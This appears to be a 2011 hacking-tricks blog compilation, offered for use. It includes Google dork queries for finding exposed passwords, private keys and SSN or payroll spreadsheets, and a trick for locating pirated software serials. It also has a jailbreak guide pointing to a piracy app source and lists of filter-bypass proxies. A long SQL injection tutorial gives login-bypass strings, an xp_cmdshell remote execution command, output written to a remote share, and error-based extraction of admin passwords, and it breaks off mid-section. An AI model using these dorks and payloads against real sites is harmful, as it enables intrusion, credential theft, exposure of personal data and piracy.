Latest hacking tricks: April 2011

How to Break into Web Sites Using Telnet

You don't have to use a web browser to access files on a web site. All you need to do is: telnet 80 Or specify port 80 in a Windows telnet. If you are using Windows 95/98/NT, whenever you are NOT logging into a telnet account, you should enable local echo. Otherwise whatever you type in (unless you are in a telnet account) will not show on the screen. To enable local echo, click Terminal --> Preferences --> Local Echo. So how do you send stuff back to the webserver? Try this: GET / HTTP/1.0

What kinds of commands can you send? The book Hackproofing Your Network <../bookstore/general.shtml> (by Ryan Russell of Securityfocus.com and Stance Cunningham) suggests a fun and harmless hack. Create and store a bogus cookie in the location on your web browser that stores cookies. (Find it by searching for the file "cookies.txt".) Name your bogus cookie something like "MyBogusCookie." Then telnet to the victim webserver and give something like this command: GET / HTTP/1.0
User-Agent: HaveABogusCookieThisIsAJoke 123.4
Cookie: /; MyBogusCookie The Überhacker! -- How to Break into Computers <../uberhacker/index.shtml>
book details a number of serious attacks you can perform through sending funny input to a webserver. Basically, you need to learn how to write shell programs, and then find ways to get them to be run by the webserver. I'm not going to explain them here, however. These attacks, when carried out against a vulnerable webserver, are so easy that little kids could do them, and I don't want to be responsible for their behavior. It's much harder for little kids to get a hold of Russell's and my books than it is for them to read this GTMHH on the Happy Hacker website. So are you dying to know what to send a webserver in order to break into it, without having to buy a book? Here are some hints. How to do this will depend on what webserver it is, what operating system it runs on, whether its security weaknesses have been fixed, and whether the web designer has used things such as Common Gateway Interface (CGI) or Server Side Includes (SSIs) that have weaknesses in them. You will have to research these issues at Web sites that archive vulnerabilities and exploits such as and . You will need to study web site programming (HTML -- hypertext markup language, CGI and SSIs) and shell programming. You will need to learn webserver commands (documented at ). You will have to use your brain and be persistent. But at least if you come across a telnet exploit, now you know the answer to the question "where do I type that command?"

How to disable right click on the blog,prevent your blog from content thief

1.sign in to your blog

2.open-->design tab-->add widge--->html/javascript

3.copy this code and paste it there.

4.click the save button...

If u found this useful please comment here..

Llist of Password Search Queries on Google

"admin account info" filetype:log
! Host=. intext :enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl: (service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd "AutoCreate=TRUE password =" "http://:@www" domainname
"index of/" "ws_ftp.ini" "parent directory" "liveice configuration file" ext:cfg -site: sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com "Powered by Duclassified" -site: duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" - site:duware.com
"Powered by Dudirectory" -site:duware.com "powered by dudownload" -site: duware.com
"Powered By Elite Forum Version ."
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
" Powered by DUpaypal" -site: duware.com
allinurl: admin mdb auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext : the
etc (index.of)
ext:asa | ext:bak intext :uid intext :pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID=" ext:ini eudora.ini
ext:ini Version=4.0.0.4 password ext:passwd -intext :the - sample -example
ext:txt inurl:unattend. txt
ext:yml database inurl:config filetype:bak createobject sa
filetype: bak inurl:"htaccess|passwd|shadow| htusers"
filetype:cfg mrtg "target[]" - sample -cvs -example
filetype:cfm "cfapplication name" password filetype: conf oekakibbs
filetype:conf slapd.conf filetype:config config intext : appSettings "User ID"
filetype:dat "password .dat"
filetype:dat inurl:Sites. dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext : mysql_connect
filetype:inc mysql_connect OR mysql_pconnect filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl: flashFXP.ini
filetype:ini ServUDaemon filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password .log"
filetype:mdb inurl: users.mdb
filetype:mdb wwforum filetype:netrc password filetype:pass pass intext :userid
filetype:pem intext : private
filetype:properties inurl:db intext :password filetype:pwd service filetype:pwl pwl
filetype:reg reg +intext :"defaultusername" +intext
:"defaultpassword"
filetype:reg reg +intext :”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password )
filetype:sql ("values MD5" | "values password " | "values * encrypt";)
filetype:sql ("passwd values" | " password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext
:"enable password 7"
intext :"enable secret 5 {:content:}quot;
intext
:"powered by EZGuestbook"
intext
:"powered by Web Wiz Journal" intitle:"index of" intext :connect.inc intitle:"index of" intext :globals.inc intitle:"Index of" passwords modified intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql. default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl: (add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle: index.of administrators.pwd
intitle: Index.of etc shadow
intitle:index.of intext :"secring.skr"|"secring. pgp"|"secring.bak"
intitle:rapidshare intext :login
inurl:"calendarscript/users. txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC. DAT" intext :"password "
inurl:"Sites. dat"+"PASS="
inurl:"slapd.conf" intext
:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext :"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial. conf" intext :"password "
inurl:/db/main. mdb
inurl:/wwwboard
inurl:/yabb/ Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar. cfg
inurl:chap-secrets -cvs
inurl:config. php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd - man
inurl:nuke filetype:sql
inurl:ospfd. conf intext :password -sample -test - tutorial -download
inurl:pap-secrets - cvs
inurl:pass.dat
inurl:perform filetype: ini
inurl:perform.ini filetype:ini
inurl: secring ext:skr | ext:pgp | ext:bak
inurl: server.cfg rcon password inurl: ventrilo_srv.ini adminpassword
inurl: vtund.conf intext :pass -cvs
inurl:zebra. conf intext :password -sample -test - tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified master.passwd
mysql history files NickServ registration passwords
passlist passlist.txt (a better way)
passwd passwd / etc (reliable)
people.lst psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password = filetype:ica

GOOGLE SEARCH TRICKS

Google Operators:

Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons
Basic Operators: +, -, ~ , ., *, “”, |,
OR
Advanced Operators: allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange

Basic Operators !!
(+) force inclusion of something common Google ignores common words (where, how, digit, single letters) by default: Example: StarStar Wars Episode +I
(-) exclude a search term Example: apple –red
(“) use quotes around a search term to search exact phrases: Example: “Robert Masse” Robert masse without “” has the 309,000 results, but “robert masse” only has 927 results. Reduce the 99% irrelevant results
Basic Operators (~) search synonym: Example: ~food Return the results about food as well as recipe, nutrition and cooking information
( . ) a single-character wildcard: Example: m.trix Return the results of M@trix, matrix, metrix…….
( * ) any word wildcard

Advanced Operators:
“Site:” Site: Domain_name Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain Examples: site:http://coolhackingtricks.blogspot.com
Advanced Operators: “Filetype:” Filetype: extension_type Find documents with specified extensions The supported extensions are: - HyperText Markup Language (html) - Microsoft PowerPoint (ppt) - Adobe Portable Document Format (pdf) - Microsoft Word (doc) - Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb) - Lotus 1-2-3 - Microsoft Excel (xls) (wk1, wk2, wk3, wk4, wk5, wki, wks, wku) - Microsoft Write (wri) - Lotus WordPro (lwp) - Rich Text Format (rtf) - MacWrite (mw) - Shockwave Flash (swf) - Text (ans, txt) Note: We actually can search asp, php and cgi, pl files as long as it is text-compatible. Example: Budget filetype: xls

Advanced Operators “Intitle:”
Intitle: search_term Find search term within the title of a Webpage
Allintitle: search_term1 search_term2 search_term3 Find multiple search terms in the Web pages with the title that includes all these words
These operators are specifically useful to find the directory lists Example: Find directory list: Intitle: Index.of “parent directory”

Advanced Operators “Inurl:”
Inurl: search_term Find search term in a Web address Allinurl: search_term1 search_term2 search_term3 Find multiple search terms in a Web address Examples: Inurl: cgi-bin Allinurl: cgi-bin password

Advanced Operators “Intext;”
Intext: search_term Find search term in the text body of a document. Allintext: search_term1 search_term2 search_term3 Find multiple search terms in the text body of a document. Examples: Intext: Administrator login Allintext: Administrator login

Advanced Operators: “Cache:”
Cache: URL Find the old version of Website in Google cache Sometimes, even the site has already been updated, the old information might be found in cache Examples: Cache: http://coolhackingtricks.blogspot.com

Advanced Operators .. Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents Examples: Computer $500..1000 DVD player $250..350

Advanced Operators: “Daterange:”
Daterange: - Find the Web pages between start date and end date Note: start_date and end date use the Julian date The Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122 Examples: 2004.07.10=2453196 2004.08.10=2453258 Vulnerabilities date range: 2453196-2453258

Advanced Operators “Link:”
Link: URL Find the Web pages having a link to the specified URL Related: URL Find the Web pages that are “similar” to the specified Web page info: URL Present some information that Google has about that Web page Define: search_term Provide a definition of the words gathered from various online sources Examples: Link: coolhackingtricks.blogspot.com Related:coolhackingtricks.blogspot.com Info:coolhackingtricks.blogspot.com Define: Network security

Advanced Operators “phonebook:”
Phonebook Search the entire Google phonebook rphonebook Search residential listings only bphonebook Search business listings only Examples: Phonebook: robert las vegas (robert in Las Vegas) Phonebook: (702) 944-2001 (reverse search, not always work) The phonebook is quite limited to U.S.A

But the Question rises What can Google can do for an Ethical Hacker?
Search sensitive information like payroll, SIN, even the personal email box
Vulnerabilities scanner
Transparent proxy So how but if i tell u a different way to search k lets do this type in the following statements n c d results we can only provide u the guidelines, now u need to implement your Creativity to Keep it rolling.
http://coolhackingtricks.blogspot.com
Salary

Salary filetype: xls site: edu
Security social insurance number

Intitle: Payroll intext: ssn filetype: xls site: edu
Security Social Insurance Number

Payroll intext: Employee intext: ssn Filetype: xls Filetype: xls “checking account” “credit card” - intext: Application -intext: Form (only 39 results)
Financial Information

Intitle: “Index of” finances.xls (9)
Personal Mailbox

Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)
Confidential Files

“not for distribution” confidential (1,760) Confidential Files “not for distribution” confidential filetype: pdf (marketing info) (456)
OS Detection
Use the keywords of the default installation page of a Web server to search.
Use the title to search
Use the footer in a directory index page

OS Detection-Windows “Microsoft-IIS/5.0 server at” OS Detection - Windows Default web page? Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0 OS Detection –Apache 1.3.11-1.3.26 Intitle: Test.Page.for.Apache seeing.this.instead OS Detection-Apache SSL enable Intitle: Test.page “SSL/TLS-aware” (127)
Search Passwords

Search the well known password filenames in URL Search the database connection files or configuration files to find a password and username Search specific username file for a specific product
Search Passwords

Inurl: etc inurl: passwd
Search Passwords

Intitle: “Index of..etc” passwd
Search Passwords

Intitle: “Index of..etc” passwd
Search Passwords

Inurl: admin.pwd filetype: pwd
Search Passwords Filetype: inc dbconn
Search Passwords

Filetype: inc intext: mysql_connect
Search Passwords

Filetype: ini +ws_ftp +pwd (get the encrypted passwords)
Search Passwords

Filetype: log inurl: “password.log” Search Username +intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for” License Key Filetype: lic lic intext: key (33) (license key) Sensitive Directories Listing Powerful buzz word: Index of Search the well known vulnerable directories names Sensitive Directories Listing “index of cgi-bin” (3590) Sensitive Directories Listing Intitle: “Index of” cfide (coldfusion directory) Sensitive Directories Listing Intitle: index.of.winnt
Get the serial number you need ! (For Certain Things)

1) Go to Google. 2) Use Keyword as "Product name" 94FBR 3) Where, "Product Name" is the name of the item you want to find the serial number for. 4) And voila - there you go - the serial number you needed.
HOW DOES THIS WORK? Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page. See these example searches:

Code:

"Photoshop 7"+94FBR "Age of Mythology"+94FBR "Nero Burning Rom 5.5"+94FBR

Top20 Scan Method : Hacking Web Servers

This method will scan the web server for the top 20 vulnerabilities list published by SANS/FBI (www.sans.org)

Hacking Tool: WebInspect

WebInspect is an impressive Web server and application-level vulnerability scanner which scans over 1500 known attacks.
It checks site contents and analyzes for rudimentary application-issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.
It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages

WebInspect enables application and web services developers to automate the discovery of security vulnerabilities as they build applications, access detailed steps for remediation of those vulnerabilities and deliver secure code for final quality assurance testing.

With WebInspect, the developer can find and correct vulnerabilities at their source, before attackers can exploit them. WebInspect provides the technology necessary to identify vulnerabilities at the next level, the Web application.

Network Tool: Shadow Security Scanner

http://www.safety-lab.com

Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments.
Shadow Security Scanner includes vulnerability auditing modules for many systems and services.
These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP,LDAP,TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL,IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and

These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and more.

Running on its native Windows platform, SSS also scans servers built practically on any platform, successfully revealing vulnerabilities in Unix, Linux, FreeBSD, OpenBSD, Net BSD, Solaris and, of course, Windows 95/98/ME/NT/2000/XP/.NET. Because of its unique architecture, SSS is the able to detect faults with CISCO, HP, and other network equipment. It is also capable of tracking more than 2,000 audits per system.

The Rules and Settings Editor will be essential for the users willing only to scan the desired ports and services without wasting time and resources on scanning other services. Flexible tuning lets system administrators manage scanning depth and other options to make benefit of speed - optimized network scanning without any loss in scanning quality.

Countermeasures

IISLockdown:
- IISLockdown restricts anonymous access to system utilities as well as the ability to write to Web content directories.
- It disables Web Distributed Authoring and Versioning (WebDAV).
- It installs the URLScan ISAPI filter.
URLScan:
- URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.

UrlScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator. Filtering requests helps secure the server by ensuring that only valid requests are processed. UrlScan helps protect Web servers because most malicious attacks share a common characteristic they involve the use of a request that is unusual in some way. For instance, the request might be extremely long, request an unusual action, be encoded using an alternate character set, or include character sequences that are rarely seen in legitimate requests. By filtering unusual requests, UrlScan helps prevent such requests from reaching the server and potentially causing damage.

Summary

Web servers assume critical importance in the realm of Internet security.
Vulnerabilities exist in different releases of popular web servers and respective vendors patch these often.
The inherent security risks owing to compromised web servers have impact on the local area networks that host these web sites, even the normal users of web browsers.
Looking through the long list of vulnerabilities that had been discovered and patched over the past few years provide an attacker ample scope to plan attacks to unpatched servers.
Different tools/exploit codes aids an attacker perpetrate web server hacking.
Countermeasures include scanning, for existing vulnerabilities and patching them immediately, anonymous access restriction, incoming traffic request screening and filtering.

Download video from youtube with out any software

Here is the easiest way to download any video from Youtube.

While playing the video on youtube.com, Copy its location from the address bar like www.youtube.com/watch?v=sasad7657dms2

then add the word ‘ save’ between www. and youtube.com/link…….

EXAMPLE: www.saveyoutube.com/watch?v=sasad7657dms2

That’s it, Download without any other software or going to any other site, as their are many but this method is the best one according to me.

Enjoy.......................................................

How To Jailbreak iPhone 4G

Step 1: Download the Greenpois0n from http://cache.greenpois0n.com/dl/gp_win32_rc4.zip (if you think this link is infected search google for greenpois0n and download it )

Step 2: Extract and run greenpois0n,then plug in your Apple item.

Step 3: Turn your apple item off.

Step 4: Press “Prepare to Jailbreak (DFU)” button in greenpois0n, you will be guided by Greenpois0n on how to perform next steps.

Step 5: Follow the steps (try being exact),Once you’re in DFU mode, click the ‘Jailbreak!’ button to jailbreak your iPhone.

Step 6: Now, just wait until the status bar shows complete, and your device will reboot to the home screen.

Step 7: You should now have a new “Loader” icon on your springboard. Launch Loader. Select Cydia > Install Cydia.

Step 8: One Cydia has successfully been installed, you will be asked if you want to remove Loader. Hit “Remove” and you iPhone will automatically reboot.You will obtain a "Cydia" icon.

It is JailBreaked :) know lets work on cydia:

-Start “Cydia” on your iPhone.

-Touch on “Manage” tab on the bottom.

-Now touch on “Sources”

-Touch on “Edit” and then on “Add”. You will be prompted to enter a url source as seen in the screenshot below. Type “http://cydia.hackulo.us/” and touch on“Add Source” .

-Know Go and search for "Appsync" and select your version , I used for my Iphone "Appsync for 4.1 os"

-Know Go to itunes on your computer (you should have the apple item ex: iphone plugged into the pc), and download any application , then sync it into your Iphone.

-We are nearly done ,Open cydia and search for Installous 3 (Note : don't choose Install0us the one with "0")

- Open Installous and start downloading apps.
iphoneblogr.com

NOW UNLOCK SITES WITH NEW PROXY SITE

friends as in school office and collages many sites are banned
and they locked them so that you can not use them but now for you this are some of the proxy sites through which you can accses to any banned site
just type the site name in the website and press go

http://www.vimuto.com Glype Proxy 3359 10 days ago
http://unstopway.com Glype Proxy 1880 10 days ago
http://www.vimuto.com Glype Proxy 4033 18 days ago
http://roxxo.net/ PHProxy 4001 22 days ago
http://www.passthe.net PHProxy 3429 23 days ago

New Proxies
URL Type Hits Time
http://npfailproxy3.info Glype Proxy 1 10 minutes ago
http://webtun5.info Glype Proxy 3 30 minutes ago
http://unfirewallmea.info Glype Proxy 1 50 minutes ago
http://fbookpasser.info Glype Proxy 3 1 hour ago
http://unfirewalledc.info Glype Proxy 4 1 hour ago
http://securewebline.info Glype Proxy 3 1 hour ago
http://tiaoyuenia.tk/ Glype Proxy 3 2 hours ago
http://accessnow4u4.info Glype Proxy 5 2 hours ago
http://playtrading.co.cc/ Glype Proxy 3 2 hours ago
http://filterscantbeatme.info Glype Proxy 8 2 hours ago
http://48usprox.info Glype Proxy 8 3 hours ago
http://letmehideu4.info Glype Proxy 7 3 hours ago
http://58usprox.info Glype Proxy 3 3 hours ago
http://56unblocknow.info Glype Proxy 3 3 hours ago
http://unblocked4u5.info Glype Proxy 5 4 hours ago
http://blockbypassa.info Glype Proxy 6 4 hours ago
http://proxyboxonline45.co.cc/ Glype Proxy 7 4 hours ago
http://50unblocknow.info Glype Proxy 6 4 hours ago

I am not giving hyper links of all due to less time but others you can copy and paste in your assress bar they all will work.....

http://hide2market.co.cc/
http://60usprox.info
http://unblockzsites5.info
http://9unblock.info
http://webtunh.info
http://unfirewalledaccess.info
http://renewalhide.co.cc/
http://allunblocked5.info
http://proxyboxonline44.co.cc/
http://givemeaccessnow.info
http://dualmarket.co.cc/
http://41usprox.info
http://proxydetox1.info
http://unblockemeplz1.info
http://breakpastit.info
http://ultrahide.co.cc
http://recessforeverbypass.info
http://skoolchatz3.info
http://mysiteunblocker.info
http://proxyboxonline43.co.cc/
http://getmeonthissite.info
http://w3bpr0x.info
http://onewaytrading.co.cc/
http://proxyshare4.info
http://vtunn3l.info
http://cantstopme4.info
http://anonymous-surfing36.co.cc/
http://limproxy.com
http://accessyoutubenow.info
http://proxyboxonline42.co.cc/
http://webtuno.info
http://ridinghotgirl.co.cc/
http://66usprox.info
http://bloxareout2.info
http://cantstopme3.info
http://s-proxy.info/
http://schoolproxyunblocker.co.cc/
http://54usprox.info
http://hideinspace.co.cc/
http://webtun8.info
http://unblockproxylist.cn/
http://ptunn3l.info
http://bloxarebad2.info
http://safetyproxy.co.cc
http://unblocked2.info
http://hideinschool.com
http://proxysites.cz.cc
http://71unblocknow.info
http://oracleeyes.co.cc
http://student-domainloans.co.cc
http://hidesu4.info
http://domainhider.co.cc
http://otunn3l.info
http://hideyouridentity.info
http://100usprox.info
http://chicklets.co.cc
http://coverme78.info
http://ublockedabcd.info

nimbuzz servers and ports

1. openfire.nimbuzz.com
2. gateway.nimbuzz.com (default baby,was closed by nimbuzz)
3. snow.nimbuzz.com
4. nickel.nimbuzz.com
5. xmpp00.nimbuzz.com
6. xmpp01.nimbuzz.com
7. xmpp02.nimbuzz.com
8. xmpp03.nimbuzz.com
9. xmpp04.nimbuzz.com
10. xmpp05.nimbuzz.com
11. xmpp06.nimbuzz.com
12. xmpp07.nimbuzz.com

PORTS:

port:
1. 5222 (for plain text/tsl/sasl)

2. 5223 (for SSL connection)

3. 443 (If dont miss, this for database connection (MySQL)

Hack Websites (SQL Injection Information)

When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

Everything between the
have potential parameters that might be useful (exploit wise).

2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

If luck is on your side, you will get login without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "file://10.10.1.3/share/output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:
